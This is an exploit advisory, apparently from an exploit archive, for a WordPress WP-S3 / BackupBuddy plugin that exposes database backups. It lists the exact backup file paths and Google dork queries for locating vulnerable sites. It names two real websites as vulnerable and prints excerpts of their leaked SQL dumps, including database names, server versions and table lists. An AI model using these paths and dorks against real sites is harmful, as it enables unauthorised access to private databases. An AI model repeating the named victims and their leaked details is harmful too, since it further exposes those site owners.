################################################################################################# # Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 17/12/2018 # Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/ # Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip # Tested On : Windows and Linux # Category : WebApps # Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql'' + intext:''Powered by Shopify'' + intext:A(c) 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify'' + intext:''2015 A(c) ALL RIGHTS RESERVED BY THE-SCHMIDT'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9 ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/uploads/wp-s3-database-backup.sql /wp-content/uploads/wp-s3-backups.zip ################################################################################################# # Example SQL Dump Some Informations and Tables Names => holysparks.org -- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64) -- -- Host: localhost Database: raeshaga_wrd1 -- ------------------------------------------------------ -- Server version 5.1.58-community-log -- Table structure for table `wp_StreamPad_Tracks` -- Dumping data for table `wp_StreamPad_Tracks` -- Table structure for table `wp_affiliates_banners_tbl` -- Dumping data for table `wp_affiliates_banners_tbl` -- Table structure for table `wp_affiliates_clickthroughs_tbl` -- Dumping data for table `wp_affiliates_clickthroughs_tbl` -- Table structure for table `wp_affiliates_leads_tbl` -- Dumping data for table `wp_affiliates_leads_tbl` -- Table structure for table `wp_affiliates_payouts_tbl` -- Dumping data for table `wp_affiliates_payouts_tbl` -- Table structure for table `wp_affiliates_sales_tbl` -- Dumping data for table `wp_affiliates_sales_tbl` -- Table structure for table `wp_affiliates_tbl` -- Dumping data for table `wp_affiliates_tbl` -- Table structure for table `wp_commentmeta` -- Dumping data for table `wp_commentmeta` -- Table structure for table `wp_comments` -- Dumping data for table `wp_comments` -- Table structure for table `wp_contact_form_7` -- Dumping data for table `wp_contact_form_7` -- Table structure for table `wp_ft_wpecards` -- Dumping data for table `wp_ft_wpecards` -- Table structure for table `wp_links` -- Dumping data for table `wp_links` -- Table structure for table `wp_options` -- Dumping data for table `wp_options` -- Dump completed.... ################################################################################################ # Example SQL Dump Informations and Tables Names => the-schmidt.com -- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64) -- -- Host: localhost Database: theschm1_blog -- ------------------------------------------------------ -- Server version 5.1.60-community-log -- Table structure for table `wp_PluginManager` -- Dumping data for table `wp_PluginManager` -- Table structure for table `wp_custom_fonts` -- Dumping data for table `wp_custom_fonts` -- Table structure for table `wp_cvg_gallery` -- Dumping data for table `wp_cvg_gallery` -- Table structure for table `wp_cvg_videos` -- Dumping data for table `wp_cvg_videos` -- Table structure for table `wp_download_status` -- Dumping data for table `wp_download_status` -- Table structure for table `wp_fancybox` -- Dumping data for table `wp_fancybox` -- Table structure for table `wp_item_category_associations` -- Dumping data for table `wp_item_category_associations` -- Table structure for table `wp_links` -- Dumping data for table `wp_links` -- Table structure for table `wp_ngg_album` -- Dumping data for table `wp_ngg_album` -- Table structure for table `wp_ngg_gallery` -- Dumping data for table `wp_ngg_gallery` -- Table structure for table `wp_ngg_pictures` -- Dumping data for table `wp_ngg_pictures` -- Table structure for table `wp_also_bought_product` -- Dumping data for table `wp_also_bought_product` -- Table structure for table `wp_blc_filters` -- Dumping data for table `wp_blc_filters` -- Table structure for table `wp_blc_instances` -- Dumping data for table `wp_blc_instances` -- Table structure for table `wp_blc_links` -- Dumping data for table `wp_blc_links` -- Table structure for table `wp_options` -- Dumping data for table `wp_options` -- Dump completed... ################################################################################################# # Example Vulnerable Sites => [+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql [+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################